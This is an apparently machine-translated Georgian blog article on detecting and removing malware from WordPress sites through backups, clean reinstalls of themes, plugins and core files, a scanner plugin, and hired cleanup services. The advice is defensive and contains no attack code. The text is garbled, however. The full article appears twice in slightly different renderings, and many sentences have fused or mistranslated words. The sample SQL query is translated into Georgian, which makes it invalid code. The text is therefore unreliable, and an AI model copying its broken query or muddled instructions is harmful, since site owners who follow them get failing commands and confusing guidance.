მავნე wordpress კოდი. როგორ ამოიღოთ ვირუსი ან მავნე კოდი WordPress-დან? თუ რამე საინტერესოს იპოვით

როგორც ერთ-ერთი ყველაზე ხშირად გამოყენებული პლატფორმა ონლაინ შინაარსის გამოქვეყნებისთვის, WordPress ხშირად ინფიცირდება მავნე პროგრამებით, ტროას ვირუსებით, მავნე კოდით და სხვა საშიში ნივთებით. რამდენიმეა პრაქტიკული სახელმძღვანელო, რომლებიც ეხება WordPress-ის უსაფრთხოებას და თქვენი საიტის მავნე პროგრამებისგან გაწმენდის საკითხებს ( მავნე კოდი). ეს თემა იმდენად მნიშვნელოვანი და აქტუალურია ვებსაიტების მფლობელებისთვის, რომ არაფერია ცუდი მის განხილვაში ისევ და ისევ დაბრუნებაში.

დამწყებთათვის, რომლებმაც ახლახან დაიწყეს დამოუკიდებელი CMS-ის გამოყენება საკუთარ ვებ სერვერზე, პანიკაში არიან, როდესაც პირველად ხვდებიან თავიანთ საიტს მავნე პროგრამით. მათი საიტის აღდგენის მცდელობებში ისინი აძლევენ საშუალებას დამატებითი შეცდომები, რაც ხშირად იწვევს ფაილების და მნიშვნელოვანი მონაცემების სრულ დაკარგვას. ამ სტატიაში ჩვენ ვისწავლით თუ როგორ მოვძებნოთ, ამოვიცნოთ და სწორად წაშალოთ მავნე პროგრამა, რათა არ დააზიანოთ თქვენი მონაცემები და ძირითადი ფაილები საიტზე.

გააკეთეთ თქვენი საიტის სარეზერვო ასლები

სანამ გადავიდოდეთ მავნე პროგრამებისა და გატეხილი საიტების განხილვაზე WordPress-ზე დაფუძნებული, მნიშვნელოვანია თქვენი საიტიდან ინფორმაციის სარეზერვო ასლების შექმნის საკითხის განხილვა. თუ ახალი ხარ WordPress-ის გამოყენებითდა სერიოზულად ხართ დაკავებული ონლაინ შინაარსის გამოქვეყნებით, მაშინ პირველი, რაც უნდა გააკეთოთ, არის სწრაფად დაეუფლონ სარეზერვო ასლების შექმნის უნარს.

თქვენი საიტის რეგულარული სარეზერვო ასლები უნდა შეიცავდეს არა მხოლოდ საიტის მონაცემთა ბაზას, არამედ ყველა ძირითად ფაილს. ამ პროცესს რამდენიმე წუთიც კი არ დასჭირდება, მაგრამ მომავალში დაზოგავთ დიდ დროსა და ნერვებს და გაგაფრთხილებთ რამდენიმე სერიოზული პრობლემები. უაღრესად გირჩევთ Backup Buddy-ს, Cloudsafe365-სა და VaultPress-ს, როგორც პრემიუმ გადაწყვეტილებებს რუტინული სარეზერვო ასლების შესასრულებლად და საჭიროების შემთხვევაში მათგან მონაცემების აღდგენისთვის. ასევე არსებობს უფასო დანამატებიამ მიზნით, როგორიცაა WP-DBManager და სახელმძღვანელო სარეზერვო ასლების შექმნის სახელმძღვანელო.

უნდა აღვადგინო საიტი თუ ვეძებ მასზე მავნე პროგრამა?

თუ იყენებთ სარეზერვო სერვისს, როგორიცაა Backup Buddy ან VaultPress, მაშინ თქვენ გაქვთ შესაძლებლობა აღადგინოთ თქვენი საიტი უფრო მეტზე. ადრეული ვერსია. თუმცა, მე მჯერა, რომ ეს არ არის ყველაზე მეტად საუკეთესო იდეა. თქვენი საიტის აღდგენა წარუმატებლობის მიზეზების გამოკვლევის გარეშე და მავნე პროგრამის აღმოფხვრამ შეიძლება გამოიწვიოს დაუცველობა თქვენს საიტზე. ამიტომ, საუკეთესო რამ არის დაუცველობის პოვნა, გამოსწორება და შემდეგ საიტის მდგომარეობის აღდგენა.

საიტზე მავნე პროგრამის არსებობის დადგენა

მავნე პროგრამა, როგორც წესი, არის მავნე შინაარსი თქვენს საიტზე, რომელიც ემატება საიტს საიტის გვერდებში, თემებში, დანამატებში, ფაილებში ან მონაცემთა ბაზაში კოდის ჩასმით. ეს კოდი შეიძლება შეიცავდეს პროგრამულ უზრუნველყოფას, რომელიც ზიანს აყენებს იმ მომხმარებლების კომპიუტერებს, რომლებიც სტუმრობენ თქვენს საიტს, სხვა ვებსაიტებს და თქვენი საიტის შიდა ჩარჩოებს. მავნე პროგრამების ინექციის მრავალი განსხვავებული ტექნიკა გამოიყენება WordPress საიტებზე თავდასხმების განსახორციელებლად.

დამუშავებული HTML კოდის შემოწმება

დაწყება მავნე პროგრამების ძებნაჩვენ შეგვიძლია დავიწყოთ იმით, თუ სად და როგორ ხდება მავნე კოდის გაშვება თქვენს საიტზე.

— ეს კოდი ყველა გვერდზეა?
- ის ხომ მხოლოდ ჩნდება კონკრეტული გვერდებიან კონკრეტულ პოსტებში?
— ზუსტად სად გამოჩნდა მავნე კოდი? ის ჩასმულია ქვედაბოლოში, საიტის სათაურში, ძირითად შინაარსში ან შიგნით გვერდითი პანელებისაიტი?

ამ კითხვებზე პასუხები დაგეხმარებათ განსაზღვროთ, თუ რომელი ფაილები უნდა შემოწმდეს საიტზე.

ჩვენ ვამოწმებთ თქვენს დანამატებსა და თემებს მავნე კოდისთვის

ვებსაიტზე თემები და დანამატები ყველაზე ხშირად თავს დაესხნენ თავს. შეგიძლიათ დაიწყოთ თქვენი თემის ფაილების მავნე კოდის შემოწმებით. თუ თქვენ გაქვთ ერთზე მეტი დიზაინის თემა თქვენს თემების საქაღალდეში, თქვენ უნდა შეამოწმოთ ყველა თემა, თუნდაც ის, რაც შეიცავს მომენტშიუმოქმედო.

მეტი მარტივი გზითტესტი იქნება თქვენი თემების საქაღალდის სარეზერვო ასლის ჩამოტვირთვა და ვებ სერვერიდან ყველა თემის წაშლა. შემდეგ ჩამოტვირთეთ ნაგულისხმევი Twenty Eleven თემის ახალი ასლი და განათავსეთ იგი თქვენს ვებ სერვერზე. ახლა შეამოწმეთ თქვენი ვებ – გვერდი: თუ მავნე კოდი გაქრა, ეს ნიშნავს, რომ ეს ყველაფერი იყო ერთ-ერთ თემატურ ფაილში. ახლა თქვენ შეგიძლიათ გაწმინდოთ თქვენი ძველი თემაფაილების ხელით გახსნით რედაქტორში და შეადარეთ "სუფთა" თემის კოდი და თქვენი თემა ნებისმიერი უცნაური ან საეჭვო კოდის ჩართვისთვის. თქვენ ასევე შეგიძლიათ ჩამოტვირთოთ თემის ახალი ასლი დეველოპერების საიტიდან.

დავუშვათ, რომ თქვენ გადახედეთ ყველა ფაილს და თემას და ვერ იპოვეთ მათში მავნე კოდი. შემდეგ შემდეგი ნაბიჯი არის დანამატების ნახვა. გამოიყენეთ იგივე მეთოდი, რაც ჩვენ გამოვიყენეთ თემებისთვის. ჩამოტვირთვა სარეზერვო დანამატებისაქაღალდეში, შემდეგ წაშალეთ ისინი თქვენი სერვერიდან. ახლა ნახეთ საიტი თქვენს ბრაუზერში და შეამოწმეთ, გაქრა თუ არა მავნე კოდი. თუ კი, პრობლემა იყო თქვენს ერთ-ერთ დანამატში საიტზე. თუ ხედავთ, რომ მავნე პროგრამა კვლავ გამოჩნდება საიტზე მოდულის ან დანამატების ინსტალაციისა და გააქტიურების შემდეგ, წაშალეთ ეს მოდული თქვენი ვებ სერვერიდან.

საუკეთესო პრაქტიკული გზებითქვენი თემებისა და დანამატების დაცვა:

- წაშალე არასაჭირო თემებიდა დანამატები თქვენი ვებ სერვერიდან.
- დარწმუნდით, რომ თქვენი თემები და დანამატები ყოველთვის სანდო წყაროებიდანაა.
— რეგულარულად განაახლეთ თემები და დანამატები საიტზე.
— არ გამოიყენოთ პრემიუმ დანამატები და ფასიანი თემები, გადმოწერილი ტორენტებიდან ან არაოფიციალური საიტებიდან.

WordPress-ის ძირითად ფაილებში ჩასმული მავნე კოდის პოვნა

თუ თქვენ უკვე შეამოწმეთ თემები და დანამატები და არცერთი მავნე კოდი არ გაქრა, მაშინ თქვენი ძიების შემდეგი ნაბიჯი არის WordPress-ის ძირითადი ფაილების შემოწმება. აქ კიდევ ერთხელ გირჩევთ გამოიყენოთ იგივე მიდგომა, როგორც დანამატებსა და თემებზე.

პირველ რიგში, ჩვენ ვაკეთებთ თქვენს საიტზე არსებული ყველა ფაილის სარეზერვო ასლს (მნიშვნელოვანია, რომ სარეზერვო ასლი შეიცავდეს ფაილებს, როგორიცაა wp-config, wp-content საქაღალდე, .htaccess და robots.txt). პროცედურის დასრულების შემდეგ სარეზერვოდაიწყეთ ყველა ფაილის წაშლა თქვენი ვებ სერვერიდან. ახლა ჩამოტვირთეთ უახლესი WordPress-ის ასლიდა დააინსტალირეთ სერვერზე. შეავსეთ wp-config ინფორმაცია თქვენი მონაცემთა ბაზიდან. ახლა გადადით საიტზე და ნახეთ, არის თუ არა მასზე რაიმე მავნე კოდი. თუ მავნე პროგრამა გაქრა, მაშინ თქვენი ბირთვის ფაილები ინფიცირებულია. ახლა ყურადღებით აღადგინეთ სურათები, ვიდეო და აუდიო ფაილები თქვენი ვებსაიტის სარეზერვო ასლიდან.

საუკეთესო პრაქტიკული გზები WordPress-ში კოდის ფაილების დასაცავად

— დარწმუნდით, რომ ყველა ნებართვა საიტზე ფაილური ოპერაციებისთვის დაყენებულია 644-ზე.
- არ შეცვალოთ ან შეცვალოთ ძირითადი ფაილები WordPress-ში.
— გამოიყენეთ ძლიერი პაროლები Shell, FTP, DB და WordPress ადმინისტრაციულ პანელში.

მავნე SQL ინექციის პოვნა WordPress-ში

ზემოთ ჩვენ უკვე განვიხილეთ WordPress დანამატები, თემები და ძირითადი. თუ ეს ყველაფერი არ დაეხმარება მავნე კოდის დამარცხებას, დროა აიღოთ მონაცემთა ბაზა. პირველ რიგში, დარწმუნდით, რომ თქვენი საიტის მონაცემთა ბაზის სარეზერვო ასლი გაქვთ. თუ რეგულარულად აკეთებთ სარეზერვო ასლებს, ყოველთვის შეგიძლიათ მარტივად აღადგინოთ წინა ვერსია DB. მანამდე კი, დარწმუნდით, რომ მავნე კოდი შევიდა მონაცემთა ბაზაში.

ჩამოტვირთეთ და დააინსტალირეთ WordPress მოდულიექსპლოიტის სკანერი. გაააქტიურეთ და დაათვალიერეთ თქვენი ვებ – გვერდი. Exploit Scanner შეამოწმებს თქვენს მონაცემთა ბაზას, ძირითად ფაილებს, დანამატებს, თემებს მათში არსებული საეჭვო კოდისთვის და მოგცემთ სკანირების შედეგს. სკანირების დასრულების შემდეგ, თქვენ გადახედავთ შედეგებს: თუ აღმოაჩენთ ბევრ შეცდომის შეტყობინებებს და ცრუ გაფრთხილებებს, თქვენ მოგიწევთ შედეგების შერჩევა ძალიან ფრთხილად. ეს მოდული არ შლის არაფერს თქვენი ფაილებიდან და მონაცემთა ბაზიდან. მას შემდეგ რაც გაარკვიეთ სად იყო ზუსტად დაინსტალირებული მავნე კოდი, თქვენ თავად მოგიწევთ ამ ფაილების ხელით წაშლა.

დააკოპირეთ კოდი, რომელიც საეჭვოდ გამოიყურება და იდენტიფიცირებულია სკანერის დანამატის მიერ და შემდეგ გაუშვით mysql მოთხოვნა მსგავსი phpMyAdmin-ის გამოყენებით:

აირჩიეთ * wp_comments-დან, სადაც comment_content მოსწონს "%SuspiciousCodeHere%"

იმის მიხედვით, თუ სად არის ჩასმული ეს საეჭვო კოდი (პოსტებში, კომენტარებში ან ცხრილებში), თქვენ მოგიწევთ ამ შეკითხვის გაშვება საიტის სხვადასხვა ველებსა და ცხრილებზე. თუ მიღებული ხაზები არ შეიცავს ძალიან ბევრ კოდს, მაშინ შეგიძლიათ ხელით შეცვალოთ ფაილები და ველები მავნე კოდის მოსაშორებლად. მეორეს მხრივ, თუ მან დააბრუნა ძალიან ბევრი სტრიქონი, მაშინ შეიძლება დაგჭირდეთ მონაცემთა ბაზის ველებზე ავტოკორექტირების გაშვება, რაც საკმაოდ სარისკოა და თუ არ იცით როგორ გამოიყენოთ ეს ინსტრუმენტი სწორად, თქვენ რისკავთ დაკარგავთ ყველა მონაცემს. თქვენი საიტიდან.

გააკეთეთ თუ არა ყველა ზემოთ ჩამოთვლილი, მაგრამ მაინც გაქვთ პრობლემები?

მე მჯერა, რომ ადამიანების უმეტესობას შეუძლია დამოუკიდებლად და შედარებით მარტივად ამოიცნოს, იპოვოს და აღმოფხვრა მავნე კოდი მათ WordPress საიტებზე. მაგრამ ზოგჯერ მავნე პროგრამა კარგად არის შენიღბული და მისი აღმოჩენა შეუძლებელია მარტივი მოცილება. თუ თქვენ სცადეთ ყველა ზემოაღნიშნული მეთოდი და მაინც ვერაფერი გაარკვიეთ ან წაშალეთ, მაშინ დროა მოიწვიოთ WordPress უსაფრთხოების ექსპერტები, გამოიყენოთ ონლაინ სერვისები ან კონსულტანტების სერვისები, რომლებიც მცირე საფასურად გაასუფთავებენ თქვენს საიტს მავნე პროგრამებისგან.

საიტის მონიტორინგისა და დასუფთავების სერვისები Sucuri-სგან

Sucuri არის კომპანია, რომელიც ეხება ვებსაიტების მონიტორინგს და უსაფრთხოებას. ისინი გვთავაზობენ სხვადასხვა სატარიფო გეგმები, მავნე პროგრამების მოცილება, ვებსაიტების მონიტორინგი და უფასო მომსახურებასაიტების სკანირება. პროცედურა საკმაოდ მარტივია და თქვენი მხრიდან არაფერს მოითხოვს: ისინი უბრალოდ ამოწმებენ თქვენს საიტს, გამოგიგზავნით შეტყობინებას, თუ რაიმე საეჭვო ან სახიფათო აღმოაჩენენ, შემდეგ კი შეგიძლიათ დარეგისტრირდეთ Sucuri-ის ვებსაიტზე ანგარიშით და გადაიტანოთ დავალება სპეციალისტი. ისინი აცხადებენ, რომ კლიენტთა საიტების უმეტესობა 4 საათში იწმინდება.

ჩვენ ვეძებთ WordPress უსაფრთხოების ინდივიდუალურ ექსპერტს

არსებობს მრავალი თავისუფალი ვებსაიტი, სადაც შეგიძლიათ განათავსოთ სამუშაო შეთავაზება უსაფრთხოების კონსულტანტისთვის თქვენი საიტის ინფექციის პრობლემის მოსაგვარებლად. ყველა მიღებული წინადადებიდან აირჩიეთ ის, ვინც მოგეჩვენებათ ყველაზე გამოცდილი და მცოდნე. თქვენ ასევე შეგიძლიათ განათავსოთ მოთხოვნა სამუშაოზე თქვენი საიტის მავნე პროგრამებისგან გაწმენდისთვის WordPress Jobs-ზე ან Smashing Magazine-ის სამუშაო საბჭოზე. უბრალოდ დარწმუნდით, რომ ადამიანი, რომელსაც დაქირავებთ ამ ამოცანების შესასრულებლად, არის გამოცდილი, რეპუტაციის მქონე და დადებითი მიმოხილვებიწინა სამუშაოს შესახებ.

დასკვნა

WordPress არის ისეთივე უსაფრთხო გამოსაყენებლად, როგორც ეს შეიძლება იყოს. როგორც ვებგვერდის მფლობელი, თქვენ ხართ პასუხისმგებელი საიტისა და თქვენს გამოყენებაზე საღი აზრივებგვერდის უსაფრთხოების ტიპიური საფრთხეების წინააღმდეგ ბრძოლაში. გამოიყენეთ ძლიერი პაროლები, შეამოწმეთ ფაილის ნებართვები, რეგულარულად გაასუფთავეთ სანიშნეები და შექმენით რეგულარული სარეზერვო ასლები - და პრობლემები არ შეგექმნებათ.

როგორც ერთ-ერთი ყველაზე ხშირად გამოყენებული პლატფორმა ონლაინ შინაარსის გამოქვეყნებისთვის, WordPress ხშირად ინფიცირებულია მავნე პროგრამებით, ტროას ვირუსებით, მავნე კოდით და სხვა საშიში ნივთებით. არსებობს რამდენიმე პრაქტიკული სახელმძღვანელო, რომელიც ეხება WordPress-ის უსაფრთხოებას და თქვენი საიტის მავნე პროგრამებისგან (მავნე კოდი) გაწმენდას. ეს თემა იმდენად მნიშვნელოვანი და აქტუალურია ვებსაიტების მფლობელებისთვის, რომ არაფერია ცუდი მის განხილვაში ისევ და ისევ დაბრუნებაში.

დამწყებთათვის, რომლებმაც ახლახან დაიწყეს დამოუკიდებელი CMS-ის გამოყენება საკუთარ ვებ სერვერზე, პანიკაში არიან, როდესაც პირველად ხვდებიან თავიანთ საიტს მავნე პროგრამით. მათი საიტის აღდგენის მცდელობისას ისინი უშვებენ დამატებით შეცდომებს, რაც ხშირად იწვევს ფაილების და მნიშვნელოვანი მონაცემების სრულ დაკარგვას. ამ სტატიაში ჩვენ ვისწავლით თუ როგორ მოვძებნოთ, ამოვიცნოთ და სწორად წაშალოთ მავნე პროგრამა, რათა არ დააზიანოთ თქვენი მონაცემები და ძირითადი ფაილები საიტზე.

გააკეთეთ თქვენი საიტის სარეზერვო ასლები

სანამ გადავიდოდეთ მავნე პროგრამებისა და გატეხილი WordPress საიტების განხილვაზე, მნიშვნელოვანია განიხილოთ თქვენი საიტიდან ინფორმაციის სარეზერვო ასლების შექმნის საკითხი. თუ თქვენ ახალი ხართ WordPress-ის გამოყენებაში და სერიოზულად ხართ დაინტერესებული ონლაინ შინაარსის გამოქვეყნებით, მაშინ პირველი, რაც უნდა გააკეთოთ, არის სწრაფად დაეუფლონ სარეზერვო ასლების შექმნის უნარს.

თქვენი საიტის რეგულარული სარეზერვო ასლები უნდა შეიცავდეს არა მხოლოდ საიტის მონაცემთა ბაზას, არამედ ყველა ძირითად ფაილს. ამ პროცესს რამდენიმე წუთიც კი არ დასჭირდება, მაგრამ მომავალში დიდ დროს და ნერვებს დაგიზოგავთ და არაერთი სერიოზული პრობლემისგან აგარიდებთ თავს. უაღრესად გირჩევთ Backup Buddy-ს, Cloudsafe365-ს და VaultPress-ს, როგორც პრემიუმ გადაწყვეტილებებს რუტინული სარეზერვო ასლების შესასრულებლად და საჭიროების შემთხვევაში მათგან მონაცემების აღდგენისთვის. ამ მიზნით ასევე არსებობს უფასო დანამატები, როგორიცაა WP-DBManager და სახელმძღვანელო სარეზერვო ასლების შექმნის სახელმძღვანელო.

უნდა აღვადგინო საიტი თუ ვეძებ მასზე მავნე პროგრამა?

თუ იყენებთ სარეზერვო სერვისს, როგორიცაა Backup Buddy ან VaultPress, მაშინ თქვენ გაქვთ შესაძლებლობა აღადგინოთ თქვენი საიტი უფრო ადრეულ ვერსიაზე. თუმცა, მე მჯერა, რომ ეს არ არის საუკეთესო იდეა. თქვენი საიტის აღდგენა წარუმატებლობის მიზეზების გამოკვლევის გარეშე და მავნე პროგრამების აღმოფხვრამ შეიძლება გამოიწვიოს დაუცველობა თქვენს საიტზე. აქედან გამომდინარე, საუკეთესო რამ იქნება დაუცველობის პოვნა, გამოსწორება და შემდეგ საიტის მდგომარეობის აღდგენა.

საიტზე მავნე პროგრამის არსებობის დადგენა

მავნე პროგრამა, როგორც წესი, არის მავნე შინაარსი თქვენს საიტზე, რომელიც ემატება საიტზე კოდის ჩასმით საიტის გვერდებზე, თემებში, დანამატებში, ფაილებში ან მონაცემთა ბაზაში. ეს კოდი შეიძლება შეიცავდეს პროგრამულ უზრუნველყოფას, რომელიც ზიანს აყენებს იმ მომხმარებლების კომპიუტერებს, რომლებიც სტუმრობენ თქვენს საიტს, სხვა ვებსაიტებს და თქვენი საიტის შიდა ჩარჩოებს. მავნე პროგრამების ინექციის მრავალი განსხვავებული ტექნიკა გამოიყენება WordPress საიტებზე თავდასხმების განსახორციელებლად.

დამუშავებული HTML კოდის შემოწმება

ჩვენ შეგვიძლია დავიწყოთ მავნე პროგრამების ძებნა იმით, თუ სად და როგორ ხდება მავნე კოდის გაშვება თქვენს საიტზე.

• არის ეს კოდი ყველა გვერდზე?
• ჩნდება მხოლოდ კონკრეტულ გვერდებზე თუ კონკრეტულ პოსტებში?
• ზუსტად საიდან გაჩნდა მავნე კოდი? ჩასმულია ძირში, საიტის სათაურში, მთავარ შინაარსში თუ საიტის გვერდითა ზოლებში?

ამ კითხვებზე პასუხები დაგეხმარებათ განსაზღვროთ, თუ რომელი ფაილები უნდა შემოწმდეს საიტზე.

ჩვენ ვამოწმებთ თქვენს დანამატებსა და თემებს მავნე კოდისთვის

ვებსაიტზე თემები და დანამატები ყველაზე ხშირად თავს დაესხნენ თავს. შეგიძლიათ დაიწყოთ თქვენი თემის ფაილების მავნე კოდის შემოწმებით. თუ თქვენ გაქვთ ერთზე მეტი დიზაინის თემა თქვენს თემების საქაღალდეში, უნდა შეამოწმოთ ყველა თემა, თუნდაც ის, რომელიც ამჟამად არააქტიურია.

შემოწმების უფრო მარტივი გზა იქნება თქვენი თემების საქაღალდის სარეზერვო ასლის ჩამოტვირთვა და ვებ სერვერიდან ყველა თემის წაშლა. შემდეგ ჩამოტვირთეთ ნაგულისხმევი თემის ახალი ასლი და განათავსეთ იგი თქვენს ვებ სერვერზე. ახლა შეამოწმეთ თქვენი ვებ – გვერდი: თუ მავნე კოდი გაქრა, ეს ნიშნავს, რომ ეს ყველაფერი იყო ერთ-ერთ თემატურ ფაილში. ახლა შეგიძლიათ გაასუფთავოთ თქვენი ძველი თემა ფაილების ხელით გახსნით რედაქტორში და შეადაროთ "სუფთა" თემის კოდი და თქვენი თემა ნებისმიერი უცნაური ან საეჭვო კოდის ჩართვაზე. თქვენ ასევე შეგიძლიათ ჩამოტვირთოთ თემის ახალი ასლი დეველოპერების ვებსაიტიდან.

დავუშვათ, რომ თქვენ გადახედეთ ყველა ფაილს და თემას და ვერ იპოვნეთ მათში რაიმე მავნე კოდი. შემდეგ შემდეგი ნაბიჯი არის დანამატების ნახვა. გამოიყენეთ იგივე მეთოდი, რაც ჩვენ გამოვიყენეთ თემებისთვის. ატვირთეთ დანამატების სარეზერვო ასლი საქაღალდეში, შემდეგ წაშალეთ ისინი სერვერიდან. ახლა ნახეთ საიტი თქვენს ბრაუზერში და შეამოწმეთ, გაქრა თუ არა მავნე კოდი. თუ კი, პრობლემა იყო თქვენს ერთ-ერთ დანამატში საიტზე. თუ ხედავთ, რომ მავნე პროგრამა კვლავ გამოჩნდება საიტზე მოდულის ან დანამატების ინსტალაციისა და გააქტიურების შემდეგ, წაშალეთ ეს მოდული თქვენი ვებ სერვერიდან.

თქვენი თემებისა და დანამატების დაცვის საუკეთესო პრაქტიკა არის:

• წაშალეთ არასაჭირო თემები და დანამატები თქვენი ვებ სერვერიდან.
• დარწმუნდით, რომ თქვენი თემები და დანამატები ყოველთვის სანდო წყაროებიდანაა.
• რეგულარულად განაახლეთ თემები და დანამატები თქვენს საიტზე.
• არ გამოიყენოთ პრემიუმ დანამატები ან ფასიანი თემები, რომლებიც გადმოწერილია ტორენტებიდან ან არაოფიციალური საიტებიდან.

WordPress-ის ძირითად ფაილებში ჩასმული მავნე კოდის პოვნა

თუ თქვენ უკვე შეამოწმეთ თემები და დანამატები და არცერთი მავნე კოდი არ გაქრა, მაშინ თქვენი ძიების შემდეგი ნაბიჯი არის WordPress-ის ძირითადი ფაილების შემოწმება. აქ კიდევ ერთხელ გირჩევთ გამოიყენოთ იგივე მიდგომა, როგორც დანამატებსა და თემებზე.

პირველ რიგში, ჩვენ ვაკეთებთ თქვენს საიტზე არსებული ყველა ფაილის სარეზერვო ასლს (მნიშვნელოვანია, რომ სარეზერვო ასლი შეიცავდეს ფაილებს, როგორიცაა wp-config, wp-content საქაღალდე, .htaccess და robots.txt). სარეზერვო პროცედურის დასრულების შემდეგ, დაიწყეთ ყველა ფაილის წაშლა თქვენი ვებ სერვერიდან. ახლა ჩამოტვირთეთ WordPress-ის ახალი ასლი და დააინსტალირეთ თქვენს სერვერზე. შეავსეთ wp-config ინფორმაცია თქვენი მონაცემთა ბაზიდან. ახლა გადადით საიტზე და ნახეთ, არის თუ არა მასზე რაიმე მავნე კოდი. თუ მავნე პროგრამა გაქრა, მაშინ თქვენი ბირთვის ფაილები ინფიცირებულია. ახლა ყურადღებით აღადგინეთ სურათები, ვიდეო და აუდიო ფაილები თქვენი ვებსაიტის სარეზერვო ასლიდან.

საუკეთესო პრაქტიკული გზები WordPress-ში კოდის ფაილების დასაცავად

• დარწმუნდით, რომ საიტზე არსებული ფაილების მუშაობის ყველა ნებართვა დაყენებულია 644-ზე.
• არ შეცვალოთ ან შეცვალოთ ძირითადი ფაილები WordPress-ში.
• გამოიყენეთ ძლიერი პაროლები Shell, FTP, DB და WordPress ადმინისტრაციულ პანელში.

მავნე SQL ინექციის პოვნა WordPress-ში

ზემოთ ჩვენ უკვე განვიხილეთ WordPress დანამატები, თემები და ძირითადი. თუ ეს ყველაფერი არ დაეხმარება მავნე კოდის დამარცხებას, დროა აიღოთ მონაცემთა ბაზა. პირველ რიგში, დარწმუნდით, რომ თქვენი საიტის მონაცემთა ბაზის სარეზერვო ასლი გაქვთ. თუ რეგულარულად აკეთებთ სარეზერვო ასლებს, ყოველთვის შეგიძლიათ მარტივად აღადგინოთ მონაცემთა ბაზის წინა ვერსია. მანამდე კი, დარწმუნდით, რომ მავნე კოდი შევიდა მონაცემთა ბაზაში.

ჩამოტვირთეთ და დააინსტალირეთ WordPress Exploit Scanner მოდული. გაააქტიურეთ და დაათვალიერეთ თქვენი ვებ – გვერდი. Exploit Scanner შეამოწმებს თქვენს მონაცემთა ბაზას, ძირითად ფაილებს, დანამატებს, თემებს მათში არსებული საეჭვო კოდისთვის და მოგცემთ სკანირების შედეგს. სკანირების დასრულების შემდეგ, თქვენ გადახედავთ შედეგებს: თუ აღმოაჩენთ უამრავ შეცდომის შეტყობინებებს და ცრუ გაფრთხილებებს, თქვენ მოგიწევთ შედეგების შერჩევა ძალიან ფრთხილად. ეს მოდული არ შლის არაფერს თქვენი ფაილებიდან და მონაცემთა ბაზიდან. მას შემდეგ რაც გაარკვიეთ სად იყო ზუსტად დაინსტალირებული მავნე კოდი, თქვენ თავად მოგიწევთ ამ ფაილების ხელით წაშლა.

თუ თქვენ უკვე არ გაგიკეთებიათ თქვენი მონაცემთა ბაზის სარეზერვო ასლი, შექმენით ის სანამ რაიმე ცვლილებას განახორციელებთ მონაცემთა ბაზაში. სარეზერვო ასლი, თუნდაც მასში მავნე კოდით, ყოველთვის უკეთესია სრული არარსებობასარეზერვო ასლები.

დააკოპირეთ კოდი, რომელიც საეჭვოდ გამოიყურება და იდენტიფიცირებულია სკანერის დანამატის მიერ და შემდეგ გაუშვით mysql მოთხოვნა მსგავსი phpMyAdmin-ის გამოყენებით:

აირჩიეთ * wp_comments-დან, სადაც comment_content მოსწონს "%SuspiciousCodeHere%"

იმის მიხედვით, თუ სად არის ჩასმული ეს საეჭვო კოდი (პოსტებში, კომენტარებში ან ცხრილებში), თქვენ მოგიწევთ ამ შეკითხვის გაშვება საიტის სხვადასხვა ველებსა და ცხრილებზე. თუ მიღებული ხაზები არ შეიცავს ძალიან ბევრ კოდს, მაშინ შეგიძლიათ ხელით შეცვალოთ ფაილები და ველები მავნე კოდის მოსაშორებლად. მეორეს მხრივ, თუ მან დააბრუნა ძალიან ბევრი სტრიქონი, მაშინ შეიძლება დაგჭირდეთ მონაცემთა ბაზის ველებზე ავტოკორექტირების გაშვება, რაც საკმაოდ სარისკოა და თუ არ იცით როგორ გამოიყენოთ ეს ინსტრუმენტი სწორად, თქვენ რისკავთ დაკარგავთ ყველა მონაცემს. თქვენი საიტიდან.

გააკეთეთ თუ არა ყველა ზემოთ ჩამოთვლილი, მაგრამ მაინც გაქვთ პრობლემები?

მე მჯერა, რომ ადამიანების უმეტესობას შეუძლია დამოუკიდებლად და შედარებით მარტივად ამოიცნოს, იპოვოს და აღმოფხვრა მავნე კოდი მათ WordPress საიტებზე. მაგრამ ზოგჯერ მავნე პროგრამა კარგად არის შენიღბული და მისი ადვილად ამოღება შეუძლებელია. თუ თქვენ სცადეთ ყველა ზემოაღნიშნული მეთოდი და მაინც ვერაფერი გაარკვიეთ ან წაშალეთ, მაშინ დროა მოიწვიოთ WordPress უსაფრთხოების ექსპერტები, გამოიყენოთ ონლაინ სერვისები ან კონსულტანტების სერვისები, რომლებიც მცირე საფასურად გაასუფთავებენ თქვენს საიტს მავნე პროგრამებისგან.

ვებსაიტების მონიტორინგისა და დასუფთავების სერვისები Sucuri Sucuri არის კომპანია, რომელიც ეხება ვებსაიტების მონიტორინგს და უსაფრთხოებას. ისინი გვთავაზობენ ფასების მრავალფეროვან გეგმას, მავნე პროგრამების მოცილებას, ვებსაიტების მონიტორინგს და ვებსაიტების სკანირების უფასო სერვისებს. პროცედურა საკმაოდ მარტივია და თქვენი მხრიდან არაფერს მოითხოვს: ისინი უბრალოდ ამოწმებენ თქვენს საიტს, გამოგიგზავნით შეტყობინებას, თუ რაიმე საეჭვო ან სახიფათო აღმოაჩენენ, შემდეგ კი შეგიძლიათ დარეგისტრირდეთ Sucuri-ის ვებსაიტზე ანგარიშით და გადაიტანოთ დავალება სპეციალისტი. ისინი აცხადებენ, რომ კლიენტთა საიტების უმეტესობა 4 საათში იწმინდება.

ჩვენ ვეძებთ WordPress უსაფრთხოების ინდივიდუალურ ექსპერტს

არსებობს მრავალი თავისუფალი ვებსაიტი, სადაც შეგიძლიათ განათავსოთ სამუშაო შეთავაზება უსაფრთხოების კონსულტანტისთვის თქვენი საიტის ინფექციის პრობლემის მოსაგვარებლად. ყველა მიღებული წინადადებიდან აირჩიეთ ის, ვინც მოგეჩვენებათ ყველაზე გამოცდილი და მცოდნე. თქვენ ასევე შეგიძლიათ განათავსოთ მოთხოვნა სამუშაოზე თქვენი საიტის მავნე პროგრამებისგან გაწმენდისთვის WordPress Jobs-ზე ან Smashing Magazine-ის სამუშაო საბჭოზე. უბრალოდ დარწმუნდით, რომ ადამიანი, რომელსაც დაქირავებთ ამ ამოცანების შესასრულებლად, არის გამოცდილი, აქვს კარგი რეპუტაცია და აქვს დადებითი მიმოხილვები წინა სამუშაოზე.

დასკვნა

WordPress არის ისეთივე უსაფრთხო გამოსაყენებლად, როგორც ეს შეიძლება იყოს. როგორც ვებსაიტის მფლობელი, თქვენ ხართ პასუხისმგებელი საიტზე და საღი აზრის გამოყენებაზე საიტის უსაფრთხოების საერთო საფრთხეებთან გამკლავებისთვის. გამოიყენეთ ძლიერი პაროლები, შეამოწმეთ ფაილის ნებართვები, რეგულარულად გაასუფთავეთ სანიშნეები და შექმენით რეგულარული სარეზერვო ასლები - და პრობლემები არ შეგექმნებათ.

